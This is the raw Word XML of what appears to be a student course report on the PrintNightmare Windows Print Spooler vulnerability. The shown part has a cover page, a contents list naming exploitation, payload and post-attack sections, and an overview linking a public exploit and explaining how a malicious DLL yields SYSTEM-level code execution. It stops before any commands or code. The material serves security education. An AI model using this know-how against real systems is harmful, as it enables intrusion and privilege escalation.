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center" w:tblpY="2401"/>
        <w:tblW w:w="4250" w:type="pct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956"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BA4154" w:rsidRPr="00596DE2" w14:paraId="47441D76" w14:textId="77777777" w:rsidTr="00206E33">
        <w:trPr>
          <w:trHeight w:val="2372"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7943" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F1FF8E0" w14:textId="559D9D80" w:rsidR="00BA4154" w:rsidRPr="00596DE2" w:rsidRDefault="00BA4154" w:rsidP="00206E33">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Calibri"/>
                <w:color w:val="156082" w:themeColor="accent1"/>
                <w:sz w:val="66"/>
                <w:szCs w:val="66"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Calibri"/>
                <w:color w:val="156082" w:themeColor="accent1"/>
                <w:sz w:val="66"/>
                <w:szCs w:val="66"/>
              </w:rPr>
              <w:t>PrintNightmare</w:t>
            </w:r>
            <w:r w:rsidRPr="00596DE2">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Calibri"/>
                <w:color w:val="156082" w:themeColor="accent1"/>
                <w:sz w:val="66"/>
                <w:szCs w:val="66"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00596DE2">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Calibri"/>
                <w:color w:val="156082" w:themeColor="accent1"/>
                <w:sz w:val="66"/>
                <w:szCs w:val="66"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Calibri"/>
                <w:color w:val="156082" w:themeColor="accent1"/>
                <w:sz w:val="66"/>
                <w:szCs w:val="66"/>
              </w:rPr>
              <w:t>Vulnerability POC</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Calibri"/>
                <w:color w:val="156082" w:themeColor="accent1"/>
                <w:sz w:val="66"/>
                <w:szCs w:val="66"/>
              </w:rPr>
              <w:br/>
            </w:r>
          </w:p>
          <w:p w14:paraId="29201D52" w14:textId="21F1F8AF" w:rsidR="004B74CB" w:rsidRDefault="00FA2AFA" w:rsidP="004B74CB">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Calibri"/>
                <w:color w:val="156082" w:themeColor="accent1"/>
                <w:sz w:val="56"/>
                <w:szCs w:val="56"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Calibri"/>
                <w:color w:val="156082" w:themeColor="accent1"/>
                <w:sz w:val="56"/>
                <w:szCs w:val="56"/>
              </w:rPr>
              <w:t>C</w:t>
            </w:r>
            <w:r w:rsidRPr="00596DE2">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Calibri"/>
                <w:color w:val="156082" w:themeColor="accent1"/>
                <w:sz w:val="56"/>
                <w:szCs w:val="56"/>
              </w:rPr>
              <w:t xml:space="preserve">ybersecurity </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Calibri"/>
                <w:color w:val="156082" w:themeColor="accent1"/>
                <w:sz w:val="56"/>
                <w:szCs w:val="56"/>
              </w:rPr>
              <w:t>Vulnerabilities and Exploits</w:t>
            </w:r>
            <w:r w:rsidR="00951700">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Calibri"/>
                <w:color w:val="156082" w:themeColor="accent1"/>
                <w:sz w:val="56"/>
                <w:szCs w:val="56"/>
              </w:rPr>
              <w:t xml:space="preserve"> - </w:t>
            </w:r>
            <w:sdt>
              <w:sdtPr>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Calibri"/>
                  <w:color w:val="156082" w:themeColor="accent1"/>
                  <w:sz w:val="56"/>
                  <w:szCs w:val="56"/>
                </w:rPr>
                <w:alias w:val="Title"/>
                <w:id w:val="13406919"/>
                <w:placeholder>
                  <w:docPart w:val="88FF36ACD6834B5388618DB88B66678F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r w:rsidR="004B74CB">
                  <w:rPr>
                    <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Calibri"/>
                    <w:color w:val="156082" w:themeColor="accent1"/>
                    <w:sz w:val="56"/>
                    <w:szCs w:val="56"/>
                  </w:rPr>
                  <w:t>CYBR 3020 E01</w:t>
                </w:r>
              </w:sdtContent>
            </w:sdt>
            <w:r w:rsidR="004B74CB" w:rsidRPr="00596DE2">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Calibri"/>
                <w:color w:val="156082" w:themeColor="accent1"/>
                <w:sz w:val="56"/>
                <w:szCs w:val="56"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07A03BBB" w14:textId="77777777" w:rsidR="004B74CB" w:rsidRPr="00596DE2" w:rsidRDefault="004B74CB" w:rsidP="00FA2AFA">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Calibri"/>
                <w:color w:val="156082" w:themeColor="accent1"/>
                <w:sz w:val="56"/>
                <w:szCs w:val="56"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0E7C07CE" w14:textId="0FA767F2" w:rsidR="00BA4154" w:rsidRPr="00596DE2" w:rsidRDefault="00BA4154" w:rsidP="00206E33">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Calibri"/>
                <w:color w:val="156082" w:themeColor="accent1"/>
                <w:sz w:val="72"/>
                <w:szCs w:val="72"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA4154" w:rsidRPr="00596DE2" w14:paraId="5F307477" w14:textId="77777777" w:rsidTr="00206E33">
        <w:trPr>
          <w:trHeight w:val="399"/>
        </w:trPr>
        <w:sdt>
          <w:sdtPr>
            <w:rPr>
              <w:rFonts w:cs="Calibri"/>
              <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
              <w:sz w:val="36"/>
              <w:szCs w:val="36"/>
            </w:rPr>
            <w:alias w:val="Subtitle"/>
            <w:id w:val="13406923"/>
            <w:placeholder>
              <w:docPart w:val="37D7BEC51098490F9CA8363FE45D9529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94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B2B177A" w14:textId="619DA98C" w:rsidR="00BA4154" w:rsidRPr="00596DE2" w:rsidRDefault="00BA4154" w:rsidP="00206E33">
                <w:pPr>
                  <w:pStyle w:val="NoSpacing"/>
                  <w:spacing w:line="276" w:lineRule="auto"/>
                  <w:rPr>
                    <w:rFonts w:cs="Calibri"/>
                    <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
                    <w:sz w:val="24"/>
                  </w:rPr>
                </w:pPr>
                <w:r>
                  <w:rPr>
                    <w:rFonts w:cs="Calibri"/>
                    <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
                    <w:sz w:val="36"/>
                    <w:szCs w:val="36"/>
                  </w:rPr>
                  <w:t>Clayton Amelia</w:t>
                </w:r>
              </w:p>
            </w:tc>
          </w:sdtContent>
        </w:sdt>
      </w:tr>
    </w:tbl>
    <w:tbl>
      <w:tblPr>
        <w:tblpPr w:leftFromText="187" w:rightFromText="187" w:vertAnchor="page" w:horzAnchor="margin" w:tblpXSpec="center" w:tblpY="11675"/>
        <w:tblW w:w="4565" w:type="pct"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8546"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BA4154" w:rsidRPr="00596DE2" w14:paraId="45B19ED1" w14:textId="77777777" w:rsidTr="00206E33">
        <w:trPr>
          <w:trHeight w:val="1562"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="854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rFonts w:cs="Calibri"/>
                <w:color w:val="156082" w:themeColor="accent1"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:alias w:val="Author"/>
              <w:id w:val="13406928"/>
              <w:placeholder>
                <w:docPart w:val="BE37C868B0B6422DA9C1D9451575D411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60F0EE91" w14:textId="22AD3F9F" w:rsidR="00BA4154" w:rsidRPr="00596DE2" w:rsidRDefault="00F43863" w:rsidP="00206E33">
                <w:pPr>
                  <w:pStyle w:val="NoSpacing"/>
                  <w:spacing w:line="276" w:lineRule="auto"/>
                  <w:rPr>
                    <w:rFonts w:cs="Calibri"/>
                    <w:color w:val="156082" w:themeColor="accent1"/>
                    <w:sz w:val="40"/>
                    <w:szCs w:val="40"/>
                  </w:rPr>
                </w:pPr>
                <w:proofErr w:type="gramStart"/>
                <w:r>
                  <w:rPr>
                    <w:rFonts w:cs="Calibri"/>
                    <w:color w:val="156082" w:themeColor="accent1"/>
                    <w:sz w:val="32"/>
                    <w:szCs w:val="32"/>
                  </w:rPr>
                  <w:t>Group ?</w:t>
                </w:r>
                <w:proofErr w:type="gramEnd"/>
              </w:p>
            </w:sdtContent>
          </w:sdt>
          <w:sdt>
            <w:sdtPr>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:color w:val="156082" w:themeColor="accent1"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:alias w:val="Date"/>
              <w:tag w:val="Date"/>
              <w:id w:val="13406932"/>
              <w:placeholder>
                <w:docPart w:val="EFE59554DB2C46569F60137BAFCB6F10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5-11-18T00:00:00Z">
                <w:dateFormat w:val="M-d-yyyy"/>
                <w:lid w:val="en-US"/>
                <w:storeMappedDataAs w:val="dateTime"/>
                <w:calendar w:val="gregorian"/>
              </w:date>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="15FD1BC0" w14:textId="6E6F23C8" w:rsidR="00BA4154" w:rsidRPr="00596DE2" w:rsidRDefault="00E24BE7" w:rsidP="00206E33">
                <w:pPr>
                  <w:pStyle w:val="NoSpacing"/>
                  <w:spacing w:line="276" w:lineRule="auto"/>
                  <w:rPr>
                    <w:rFonts w:cs="Calibri"/>
                    <w:color w:val="156082" w:themeColor="accent1"/>
                    <w:sz w:val="40"/>
                    <w:szCs w:val="40"/>
                  </w:rPr>
                </w:pPr>
                <w:r>
                  <w:rPr>
                    <w:rFonts w:cs="Calibri"/>
                    <w:color w:val="156082" w:themeColor="accent1"/>
                    <w:sz w:val="32"/>
                    <w:szCs w:val="32"/>
                  </w:rPr>
                  <w:t>11-18-2025</w:t>
                </w:r>
              </w:p>
            </w:sdtContent>
          </w:sdt>
          <w:p w14:paraId="2A1E5DE2" w14:textId="77777777" w:rsidR="00BA4154" w:rsidRPr="00596DE2" w:rsidRDefault="00BA4154" w:rsidP="00206E33">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:color w:val="156082" w:themeColor="accent1"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6A04655D" w14:textId="77777777" w:rsidR="00BA4154" w:rsidRPr="00596DE2" w:rsidRDefault="00BA4154" w:rsidP="00206E33">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:color w:val="156082" w:themeColor="accent1"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="49423A6B" w14:textId="77B973C1" w:rsidR="007211A9" w:rsidRDefault="007211A9" w:rsidP="000E2951">
      <w:pPr>
        <w:pStyle w:val="TOCHeading"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="209AAC80" w14:textId="77777777" w:rsidR="007211A9" w:rsidRDefault="007211A9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/>
          <w14:ligatures w14:val="none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11799603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CE64F" w14:textId="3C9F6068" w:rsidR="000E2951" w:rsidRDefault="000E2951" w:rsidP="000E2951">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
            <w:spacing w:line="360" w:lineRule="auto"/>
          </w:pPr>
          <w:r>
            <w:t>Table of Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="65444EA8" w14:textId="77777777" w:rsidR="00D60D46" w:rsidRPr="00D60D46" w:rsidRDefault="00D60D46" w:rsidP="00D60D46">
          <w:pPr>
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="77035E9E" w14:textId="4B8AE33A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02059" w:history="1">
            <w:r w:rsidRPr="003B0183">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>What is Print Nightmare?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D0D4" w14:textId="5E807284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0" w:history="1">
            <w:r w:rsidRPr="003B0183">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>What cube0x0/CVE-2021-1675 exploit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318D" w14:textId="675049FB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1" w:history="1">
            <w:r w:rsidRPr="003B0183">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>PrintNightmare (CVE-2021-1675 / 34527) – Step-by-Step Exploitation and Defender’s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D493" w14:textId="5585491B" w:rsidR="000E2951" w:rsidRDefault="000E2951" w:rsidP="000E295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2" w:history="1">
            <w:r w:rsidRPr="003B0183">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1. Understanding the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EA09" w14:textId="79672AB8" w:rsidR="000E2951" w:rsidRDefault="000E2951" w:rsidP="000E295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3" w:history="1">
            <w:r w:rsidRPr="003B0183">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2. Exploitation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44EC" w14:textId="4F07D178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4" w:history="1">
            <w:r w:rsidRPr="003B0183">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Exploitation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C9B5" w14:textId="4CCEB1EF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5" w:history="1">
            <w:r w:rsidRPr="003B0183">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Payload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F288" w14:textId="292E9BA4" w:rsidR="000E2951" w:rsidRDefault="000E2951" w:rsidP="000E295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6" w:history="1">
            <w:r w:rsidRPr="003B0183">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Configure Samba services to host the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13B6" w14:textId="66A580AA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7" w:history="1">
            <w:r w:rsidRPr="003B0183">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>GitHub Exploit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11D2" w14:textId="73C738BA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8" w:history="1">
            <w:r w:rsidRPr="003B0183">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Victim Reconnaissance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483ED" w14:textId="4EE8ECC7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69" w:history="1">
            <w:r w:rsidRPr="003B0183">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Exploit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DE62" w14:textId="4FDE3F03" w:rsidR="000E2951" w:rsidRDefault="000E2951" w:rsidP="000E2951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0" w:history="1">
            <w:r w:rsidRPr="003B0183">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Attack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33CA" w14:textId="3471E212" w:rsidR="000E2951" w:rsidRDefault="000E2951" w:rsidP="000E295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1" w:history="1">
            <w:r w:rsidRPr="003B0183">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Post Attack Exploitations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97B1" w14:textId="1E99BFBB" w:rsidR="000E2951" w:rsidRDefault="000E2951" w:rsidP="000E2951">
          <w:pPr>
            <w:pStyle w:val="TOC3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2" w:history="1">
            <w:r w:rsidRPr="003B0183">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>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0377" w14:textId="102B81E5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3" w:history="1">
            <w:r w:rsidRPr="003B0183">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Vulnerability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E5D7" w14:textId="05E1C72B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4" w:history="1">
            <w:r w:rsidRPr="003B018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3B75" w14:textId="0DB397C7" w:rsidR="000E2951" w:rsidRDefault="000E2951" w:rsidP="000E2951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14502075" w:history="1">
            <w:r w:rsidRPr="003B0183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_Toc214502075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D0C2" w14:textId="77777777" w:rsidR="000E2951" w:rsidRDefault="000E2951" w:rsidP="000E2951">
          <w:pPr>
            <w:spacing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F63CDE" w14:textId="365CD511" w:rsidR="000E2951" w:rsidRPr="000E2951" w:rsidRDefault="000E2951">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED87E7C" w14:textId="1C9230F1" w:rsidR="005B0BD4" w:rsidRPr="00FE4311" w:rsidRDefault="00BC31E8" w:rsidP="005B0BD4">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc214502059"/>
      <w:r w:rsidRPr="00FE4311">
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>What is Print Nightmare?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidR="00FE4311">
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> Slides 1-3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CE1D16" w14:textId="08B5600B" w:rsidR="0038487F" w:rsidRPr="00FE4311" w:rsidRDefault="0038487F" w:rsidP="00A00A2A">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE4311">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">The PrintNightmare vulnerability is a major flaw in the Windows Print Spooler service (CVE-2021-1675, CVE-2021-34527, CVE-2021-34481) that lets any authenticated user exploit the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE4311">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>RpcAddPrinterDriverEx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE4311">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> function to remotely install printer drivers and ultimately execute code with SYSTEM-level privileges, enabling rapid escalation to domain admin and posing serious risks in enterprise environments.</w:t>
      </w:r>
      <w:r w:rsidR="005610A0" w:rsidRPr="00FE4311">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001F29CD" w:rsidRPr="00FE4311">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>(Cybereason Global SOC Team, 2021; Byatt, 2022)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268E778B" w14:textId="77777777" w:rsidR="0007644C" w:rsidRPr="00FE4311" w:rsidRDefault="0007644C" w:rsidP="00A00A2A">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EBEC924" w14:textId="42700104" w:rsidR="00375E76" w:rsidRPr="00FE4311" w:rsidRDefault="00375E76" w:rsidP="00BE2091">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc214502060"/>
      <w:r w:rsidRPr="00FE4311">
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">What cube0x0/CVE-2021-1675 </w:t>
      </w:r>
      <w:r w:rsidR="00735EF7" w:rsidRPr="00FE4311">
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4311">
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">xploit </w:t>
      </w:r>
      <w:r w:rsidR="00735EF7" w:rsidRPr="00FE4311">
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4311">
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>oes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="18373935" w14:textId="77777777" w:rsidR="00375E76" w:rsidRPr="00FE4311" w:rsidRDefault="00375E76" w:rsidP="00375E76">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE4311">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">Link: </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00FE4311">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:highlight w:val="yellow"/>
          </w:rPr>
          <w:t>https://github.com/cube0x0/CVE-2021-1675</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="199A528A" w14:textId="77777777" w:rsidR="00375E76" w:rsidRPr="00FE4311" w:rsidRDefault="00375E76" w:rsidP="00375E76">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE4311">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">This exploit targets </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4311">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>PrintNightmare</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4311">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">, a vulnerability in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4311">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Windows Print Spooler service</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4311">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505D3905" w14:textId="6FC3393B" w:rsidR="00375E76" w:rsidRPr="00FE4311" w:rsidRDefault="00361F5F" w:rsidP="00375E76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>Does the following</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23615A32" w14:textId="3F0A2201" w:rsidR="00375E76" w:rsidRPr="00FE4311" w:rsidRDefault="00375E76" w:rsidP="00375E76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 xml:space="preserve"> Remote Code Execution (RCE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CE00C9" w14:textId="77777777" w:rsidR="00375E76" w:rsidRPr="00FE4311" w:rsidRDefault="00375E76" w:rsidP="00245EF1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 xml:space="preserve">Allows an authenticated attacker (domain user or local user) to </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4311">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>execute arbitrary code on a remote Windows system</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4311">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> by forcing the Print Spooler to load a malicious DLL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420109F1" w14:textId="358E868C" w:rsidR="00375E76" w:rsidRPr="00FE4311" w:rsidRDefault="00375E76" w:rsidP="00375E76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>Local Privilege Escalation (LPE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE7441C" w14:textId="77777777" w:rsidR="00375E76" w:rsidRPr="00FE4311" w:rsidRDefault="00375E76" w:rsidP="00245EF1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 xml:space="preserve">On systems where a user can interact with the spooler locally, the exploit can escalate privileges to </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4311">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>SYSTEM</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4311">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2CACAF" w14:textId="0573F583" w:rsidR="00375E76" w:rsidRPr="00FE4311" w:rsidRDefault="00375E76" w:rsidP="00375E76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>DLL Injection through a printer driver installation path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE96621" w14:textId="77777777" w:rsidR="00375E76" w:rsidRPr="00FE4311" w:rsidRDefault="00375E76" w:rsidP="005F50EA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The Print Spooler loads the attacker-controlled DLL as a printer driver, giving full system privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA3BC17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42F3626B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162AFB5B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4AE97C57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4EA20216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203D4581" w14:textId="77777777" w:rsidR="0007644C" w:rsidRPr="00FE4311" w:rsidRDefault="0007644C" w:rsidP="0007644C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="571E4836" w14:textId="0FD052A0" w:rsidR="00B54A2C" w:rsidRPr="00FE4311" w:rsidRDefault="00B54A2C" w:rsidP="00037EB6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc214502061"/>
      <w:r w:rsidRPr="00FE4311">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>PrintNightmare (CVE-2021-1675 / 34527) – Step-by-Step Exploitation and Defender’s Perspective</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="095E01CB" w14:textId="77777777" w:rsidR="000B6674" w:rsidRPr="00FE4311" w:rsidRDefault="000B6674" w:rsidP="000B6674">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C4AC0C1" w14:textId="77777777" w:rsidR="00B54A2C" w:rsidRPr="00FE4311" w:rsidRDefault="00B54A2C" w:rsidP="00B47DA4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc214502062"/>
      <w:r w:rsidRPr="00FE4311">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>1. Understanding the Vulnerability</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="7AD170BF" w14:textId="77777777" w:rsidR="00B54A2C" w:rsidRPr="00FE4311" w:rsidRDefault="00B54A2C" w:rsidP="00B54A2C">
